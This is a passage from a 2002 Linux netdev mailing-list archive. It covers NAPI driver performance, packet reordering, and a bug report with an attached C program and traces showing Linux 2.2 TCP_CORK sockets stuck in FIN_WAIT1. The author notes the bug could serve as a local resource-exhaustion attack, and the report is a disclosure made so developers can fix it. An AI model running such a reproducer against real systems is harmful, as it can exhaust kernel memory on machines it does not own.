Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 17 Sep 2002 21:58:52.0581 (UTC) FILETIME=[69135D50:01C25E95] X-archive-position: 237 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > > From: Andrew Morton > Date: Tue, 17 Sep 2002 14:45:08 -0700 > > "David S. Miller" wrote: > > Well, it is due to the same problems manfred saw initially, > > namely just a crappy or buggy NAPI driver implementation. 
:-) > > It was due to additional inl()'s and outl()'s in the driver fastpath. > > How many? Did the implementation cache the register value in a > software state word or did it read the register each time to write > the IRQ masking bits back? > Looks like it cached it: - outw(SetIntrEnb | (inw(ioaddr + 10) & ~StatsFull), ioaddr + EL3_CMD); vp->intr_enable &= ~StatsFull; + outw(vp->intr_enable, ioaddr + EL3_CMD); > It is issues like this that make me say "crappy or buggy NAPI > implementation" > > Any driver should be able to get the NAPI overhead to max out at > 2 PIOs per packet. > > And if the performance is really concerning, perhaps add an option to > use MEM space in the 3c59x driver too, IO instructions are constant > cost regardless of how fast the PCI bus being used is :-) Yup. But deltas are interesting. From hadi@cyberus.ca Tue Sep 17 18:00:05 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 18:00:11 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I104tG031332 for ; Tue, 17 Sep 2002 18:00:04 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id VAA00861; Tue, 17 Sep 2002 21:05:03 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8I0vwg03728; Tue, 17 Sep 2002 20:57:58 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Tue, 17 Sep 2002 20:57:58 -0400 (EDT) From: jamal To: Andrew Morton cc: "David S. 
Miller" , , , Subject: Re: Info: NAPI performance at "low" loads In-Reply-To: <3D87A59C.410FFE3E@digeo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 238 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Manfred, could you please turn MMIO (you can select it via kernel config) and see what the new difference looks like? I am not so sure with that 6% difference there is no other bug lurking there; 6% seems too large for an extra two PCI transactions per packet. If someone could test a different NIC this would be great. Actually what would be even better is to go something like 20kpps, 50kpps, 80 kpps, 100kpps and 140 kpps and see what we get. cheers, jamal From davem@redhat.com Tue Sep 17 18:04:19 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 18:04:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I14JtG031688 for ; Tue, 17 Sep 2002 18:04:19 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id SAA18025; Tue, 17 Sep 2002 18:00:15 -0700 Date: Tue, 17 Sep 2002 18:00:14 -0700 (PDT) Message-Id: <20020917.180014.07882539.davem@redhat.com> To: hadi@cyberus.ca Cc: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads From: "David S. 
Miller"
In-Reply-To:
References: <3D87A59C.410FFE3E@digeo.com>
X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 239
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

   From: jamal
   Date: Tue, 17 Sep 2002 20:57:58 -0400 (EDT)

   I am not so sure with that 6% difference there is no other bug lurking
   there; 6% seems too large for an extra two PCI transactions per packet.

{in,out}{b,w,l}() operations have a fixed timing, therefore his
results don't sound that far off.

It is also one of the reasons I suspect Andrew saw such bad results
with 3c59x, but probably that is not the only reason.

From hadi@cyberus.ca Tue Sep 17 18:09:55 2002
Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 18:09:57 -0700 (PDT)
Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I19rtG032073 for ; Tue, 17 Sep 2002 18:09:55 -0700
Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.)
with ESMTP id VAA03765; Tue, 17 Sep 2002 21:14:53 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8I17rM03745; Tue, 17 Sep 2002 21:07:54 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Tue, 17 Sep 2002 21:07:53 -0400 (EDT) From: jamal To: Ben Greear cc: Chris Friesen , Cacophonix , , Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation In-Reply-To: <3D875BA9.70501@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 240 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Tue, 17 Sep 2002, Ben Greear wrote: > I have a program that sends and receives UDP packets with 32-bit sequence > numbers. I can detect OOO packets if they fit into the last 10 packets > received. If they are farther out of order than that, the code treats > them as dropped.... > So let me understand this: You have a packet going out eth0 looped back to eth0 and you are seeing reordering? What sort of things are happening from departure at udp socket to arrival on the other side? Are you doing anything funky yourself or it is all kernel? > I used smp_afinity to tie a NIC to a CPU, and the napi patch for 2.4.20-pre7. Did you get reordering with affinity? > > When sending and receiving 250Mbps of UDP/IP traffic (sending over cross-over > cable to other NIC on same machine), I see the occasional OOO packet. I also > see bogus dropped packets, which means sometimes the order is off by 10 or more > packets.... A lot of shit is happening at that rate in particular with PCI bus. If i understood correctly a packet crosses the bus about 4 times? > > The other fun thing about this setup is that after running around 65 billion bytes > with this test, the machine crashes with an OOPs. 
No clue whats going on - probably a race somewhere and cant help since i dont have this NIC but if you get Robert excited he might be able to help you. > I can repeat this at will, but so far only on > this dual-proc machine, and only using the e1000 driver (NAPI or regular). Soon, I'll > test with a 4-port tulip NIC to see if I can take the e1000 out of the equation... > I doubt youll see it there. cheers, jamal From mbp@samba.org Tue Sep 17 19:02:00 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:02:07 -0700 (PDT) Received: from sngrel5.hp.com (sngrel5.hp.com [192.6.86.210]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I21qtG001129 for ; Tue, 17 Sep 2002 19:01:56 -0700 Received: from ctss11.sgp.hp.com (ctss11.sgp.hp.com [15.85.49.5]) by sngrel5.hp.com (Postfix) with ESMTP id 7431A630 for ; Wed, 18 Sep 2002 10:06:48 +0800 (SGP) Received: from XAUBRG2.AUS.HP.COM (xaubrg2.aus.hp.com [15.23.69.43]) by ctss11.sgp.hp.com (8.9.3 (PHNE_18979)/8.9.3 SMKit6.0.6 OpenMail BPI enabled) with SMTP id KAA02261 for ; Wed, 18 Sep 2002 10:06:40 +0800 (SGP) Received: from 15.23.69.43 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:04:37 +1000 Received: from XAUBRG2.AUS.HP.COM (localhost [127.0.0.1]) by XAUBRG2.AUS.HP.COM with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id SJWWT6T4; Wed, 18 Sep 2002 12:04:36 +1000 Received: from 16.176.68.120 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:04:35 +1000 Received: from mbp by vexed.aus.hp.com with local (Exim 3.36 #1 (Debian)) id 17rUBx-0000og-00; Wed, 18 Sep 2002 12:03:49 +1000 Date: Wed, 18 Sep 2002 12:03:49 +1000 From: Martin Pool To: davem@redhat.com, ak@muc.de, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, Alan.Cox@linux.org Subject: FIN_WAIT1 / TCP_CORK / 2.2 -- reproducible bug and test case Message-ID: <20020918020346.GA2285@samba.org> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="yrj/dFKFPuw6o+aM" Content-Disposition: 
inline User-Agent: Mutt/1.4i X-GPG: 1024D/A0B3E88B: AFAC578F 1841EE6B FD95E143 3C63CA3F A0B3E88B X-archive-position: 241 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbp@samba.org Precedence: bulk X-list: netdev --yrj/dFKFPuw6o+aM Content-Type: text/plain; charset=us-ascii Content-Disposition: inline (Sorry for spamming people directly; my list message didn't get a reply and it's a serious bug in some circumstances.) I've discovered a bug in Linux 2.2 that allows TCP sockets to get stuck in FIN_WAIT1 with no timeout or retransmissions. Code to demonstrate the problem, plus a tcpdump of it happening, is attached. There are more details about what's going on, as I understand it, in the headers. I suspect there is a mishandling of sk->nonagle==2 in tcp_send_test(), but I have not yet puzzled out the code enough to say exactly what it is. I think basically the handling of a closing socket that still has corks set is broken. You might argue that this is a security bug because it allows local users to consume arbitrarily large (?) kernel resources, and in some cases the resources cannot be released without a reboot. (Or perhaps a spoofed RST packet would fix it too.) -- Martin --yrj/dFKFPuw6o+aM Content-Type: text/x-csrc; charset=us-ascii Content-Disposition: attachment; filename="corked_demo.c" /* -*- c-file-style: "java"; indent-tabs-mode: nil -*- * * corked_demo.c -- Demonstrate Linux 2.2 bug relating to TCP_CORKED sockets. * * Written 2002 by Martin Pool * * Build this, run it as root with something like "sudo ./corked_demo * SOMEHOST 9" to write to the discard port. (It needs root access to * set SO_DEBUG.) The other machine must be running the discard * service to accept the connection and data. * * Basically all it does is open a corked connection, and then drop it * while there is (possibly) data in the SendQ. 
The socket gets
 * "stuck" in FIN_WAIT1 and doesn't seem to be able to flush the last
 * bit of data.
 *
 * If you have an affected version of the kernel, most times this is
 * run you will get a socket stuck in FIN_WAIT1 state.  It looks
 * like this:
 *
 * tcp 0 3201 maudlin:1048 maudlin:discard FIN_WAIT1 root 0 - off (0.00/0/0)
 *
 * This happens in 2.2.16, .18, and .21.
 *
 * It seems to me that this *has* to be incorrect, because there is
 * data waiting to go out, but no timer running.  The socket stays
 * stuck, chewing up kernel memory forever.
 *
 * Running a hundred iterations gives 36 stuck in this state.
 *
 * On the server the situation is almost as bad: the sockets end up in
 * ESTABLISHED state, but they'll never receive more data.  Presumably
 * they'll hang around until the server gives up and terminates, or
 * until the TCP 2-hour timeout elapses.
 *
 * Sometimes killing off the server makes the FIN_WAIT1 sockets go
 * away on the client, but it is not reliable.  However, neither side
 * seems to time out of its own accord -- I left the two machines
 * sitting overnight and all the sockets were still
 * FIN_WAIT1/ESTABLISHED in the morning.
 *
 * tcpdump shows that the FIN is not sent when the client program
 * closes the socket.  However, when the server program is killed, its
 * FIN gets things flowing again.
 *
 * I think that on the system where this was originally seen, both the
 * client and the server used corks, and so killing the server program
 * and closing its socket didn't send a FIN, and therefore things
 * stayed jammed indefinitely.
 *
 * Since this can be provoked with local unprivileged access, and
 * since the sockets apparently can't be cleared up without a reboot,
 * it could be considered a kind of resource exhaustion attack.  If it
 * happens inadvertently, it can cause problems on the server by
 * causing the remote machine to hang until it is killed off.
 */

/* The header names were lost from the archived copy of this file; the
 * headers below are the ones this code needs to build on Linux. */
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/**
 * Open a socket to a tcp remote host with the specified port.
 *
 * The socket is (if appropriate) corked on return, so that the third
 * handshake should be sent containing useful data.
 *
 * Stolen from rsync via distcc.
 *
 * @todo Don't try for too long to connect.
 **/
int open_socket_out(const char *host, int port, int *p_fd)
{
    int type = SOCK_STREAM;
    struct sockaddr_in sock_out;
    int fd;
    struct hostent *hp;

    fd = socket(PF_INET, type, 0);
    if (fd == -1) {
        printf("failed to create socket: %s\n", strerror(errno));
        exit(1);
    }

    hp = gethostbyname(host);
    if (!hp) {
        fprintf(stderr, "unknown host: \"%s\"\n", host);
        (void) close(fd);
        exit(1);
    }

    memcpy(&sock_out.sin_addr, hp->h_addr, (size_t) hp->h_length);
    sock_out.sin_port = htons(port);
    sock_out.sin_family = PF_INET;

    if (connect(fd, (struct sockaddr *) &sock_out, (int) sizeof(sock_out))) {
        fprintf(stderr, "failed to connect to %s port %d: %s\n", host, port,
                strerror(errno));
        (void) close(fd);
        exit(1);
    }

    printf("client got connection to %s port %d on fd%d\n", host, port, fd);

    *p_fd = fd;
    return 0;
}

/**
 * Stick a TCP cork in the socket.
 **/
int tcp_cork_sock(int fd, int corked)
{
    if (setsockopt(fd, SOL_TCP, TCP_CORK, &corked, sizeof corked) == -1) {
        fprintf(stderr, "setsockopt(corked=%d) failed: %s\n", corked,
                strerror(errno));
        exit(1);
    }
    printf("%scorked fd%d\n", corked ? "" : "un", fd);
    return 0;
}

int debug_sock(int fd, int debug_on)
{
    if (setsockopt(fd, SOL_SOCKET, SO_DEBUG, &debug_on, sizeof debug_on) == -1) {
        fprintf(stderr, "setsockopt(debug=%d) failed: %s\n", debug_on,
                strerror(errno));
        exit(1);
    }
    printf("%sdebug fd%d\n", debug_on ?
"" : "un", fd); return 0; } int dcc_writex(int fd, const void *buf, size_t len) { ssize_t r; while (len > 0) { r = write(fd, buf, len); if (r == -1) { fprintf(stderr, "failed to write: %s\n", strerror(errno)); return -1; } else if (r == 0) { fprintf(stderr, "unexpected eof on fd%d\n", fd); return -1; } else { buf = &((char *) buf)[r]; len -= r; } } return 0; } int send_junk(int fd) { static char trash[100000]; return dcc_writex(fd, trash, sizeof trash); } int main(int argc, char **argv) { int fd; if (argc != 3) { fprintf(stderr, "usage: corked_demo HOST NUMERICPORT\n"); return 1; } open_socket_out(argv[1], atoi(argv[2]), &fd); debug_sock(fd, 1); tcp_cork_sock(fd, 1); send_junk(fd); return 0; } --yrj/dFKFPuw6o+aM Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="corked_tcpdump.txt" tcpdump: listening on eth0 04:39:25.336746 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: S 2229455302:2229455302(0) win 16060 (DF) 04:39:25.336913 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: S 3652179257:3652179257(0) ack 2229455303 win 5792 (DF) 04:39:25.337134 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . ack 1 win 16060 (DF) 04:39:25.343813 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: P 1:1449(1448) ack 1 win 16060 (DF) 04:39:25.344057 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: P 1449:2897(1448) ack 1 win 16060 (DF) 04:39:25.344012 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 1449 win 8688 (DF) 04:39:25.344160 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 2897 win 11584 (DF) 04:39:25.344657 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 2897:4345(1448) ack 1 win 16060 (DF) 04:39:25.345093 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 4345:5793(1448) ack 1 win 16060 (DF) 04:39:25.345299 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 
5793:7241(1448) ack 1 win 16060 (DF) 04:39:25.345407 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 7241:8689(1448) ack 1 win 16060 (DF) 04:39:25.345059 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 4345 win 14480 (DF) 04:39:25.345210 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 5793 win 17376 (DF) 04:39:25.345389 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 7241 win 20272 (DF) 04:39:25.345499 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 8689 win 23168 (DF) 04:39:25.345686 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 8689:10137(1448) ack 1 win 16060 (DF) 04:39:25.345880 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 10137:11585(1448) ack 1 win 16060 (DF) 04:39:25.346046 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 11585:13033(1448) ack 1 win 16060 (DF) 04:39:25.346230 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 13033:14481(1448) ack 1 win 16060 (DF) 04:39:25.346424 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 14481:15929(1448) ack 1 win 16060 (DF) 04:39:25.346534 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 15929:17377(1448) ack 1 win 16060 (DF) 04:39:25.346651 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 17377:18825(1448) ack 1 win 16060 (DF) 04:39:25.346759 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . 18825:20273(1448) ack 1 win 16060 (DF) 04:39:25.345806 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 10137 win 26064 (DF) 04:39:25.345970 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 11585 win 28960 (DF) 04:39:25.346208 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 13033 win 31856 (DF) 04:39:25.346323 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 14481 win 34752 (DF) 04:39:25.346516 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . 
ack 15929 win 37648 (DF) 04:39:25.346624 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 17377 win 40544 (DF) 04:39:25.346742 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 18825 win 43440 (DF) 04:39:25.346849 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 20273 win 46336 (DF) 04:39:25.347261 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: . ack 21721 win 49232 (DF) (now, kill the server) 04:39:43.795571 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: F 1:1(0) ack 99913 win 63712 (DF) 04:39:43.795643 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: . ack 2 win 16060 (DF) 04:39:43.795801 maudlin.ozlabs.hp.com.1884 > nevada.aus.hp.com.discard: FP 99913:100001(88) ack 2 win 16060 (DF) 04:39:43.795890 nevada.aus.hp.com.discard > maudlin.ozlabs.hp.com.1884: R 3652179259:3652179259(0) win 0 (DF) 36 packets received by filter 0 packets dropped by kernel --yrj/dFKFPuw6o+aM Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=corked-out-20020917-2009 ev: 1.0 Type: Direct-Access ANSI SCSI revision: 02 Detected scsi disk sda at scsi0, channel 0, id 0, lun 0 scsi0: Target 0: Queue Depth 28, Asynchronous scsi : detected 1 SCSI disk total. SCSI device sda: hdwr sector= 512 bytes. Sectors= 2097152 [1024 MB] [1.0 GB] pcnet32.c: PCI bios is present, checking for devices... PCI Master Bit has not been set. Setting... Found PCnet/PCI at 0x10a0, irq 10. eth0: PCnet/PCI II 79C970A at 0x10a0, 00 50 56 40 00 52 assigned IRQ 10. pcnet32.c:v1.25kf 26.9.1999 tsbogend@alpha.franken.de Partition check: sda: sda1 sda2 < sda5 > IA-32 Microcode Update Driver: v1.08 VFS: Mounted root (ext2 filesystem) readonly. 
Freeing unused kernel memory: 60k freed scsi0: Tagged Queuing now active for Target 0 Adding Swap: 268264k swap-space (priority -1) tcp_snd_test sk=c7977740, skb=c7a72ac0, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87a40, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87680, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a875e0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a875e0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87540, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87540, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87540, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a874a0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a874a0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a874a0, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87400, tail=0 tcp_snd_test 
skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87400, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87400, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87180, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87180, tail=0 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87900, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87900, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a870e0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a870e0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87720, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87720, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87360, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87360, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a875e0, tail=1 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test 
returns 0 tcp_snd_test sk=c7977740, skb=c7a875e0, tail=1 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a72ac0, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87360, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a870e0, tail=1 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a875e0, tail=1 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87860, tail=1 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87860, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87860, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a872c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a872c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87220, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87220, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87220, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87e00, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87e00, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87540, tail=0 
tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87540, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a877c0, tail=0 tcp_snd_test skb->flags=0x10, sk->nonagle=2, nagle_check=1 tcp_snd_test returns 1 tcp_snd_test sk=c7977740, skb=c7a87900, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=0 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87900, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=0 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87900, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=0 tcp_snd_test returns 0 tcp_snd_test sk=c7977740, skb=c7a87900, tail=1 tcp_snd_test skb->flags=0x18, sk->nonagle=2, nagle_check=0 tcp_snd_test returns 0 --yrj/dFKFPuw6o+aM-- From davem@redhat.com Tue Sep 17 19:02:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:02:39 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I22btG001228 for ; Tue, 17 Sep 2002 19:02:37 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id SAA18269; Tue, 17 Sep 2002 18:58:01 -0700 Date: Tue, 17 Sep 2002 18:58:01 -0700 (PDT) Message-Id: <20020917.185801.76605813.davem@redhat.com> To: mbp@samba.org Cc: ak@muc.de, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, 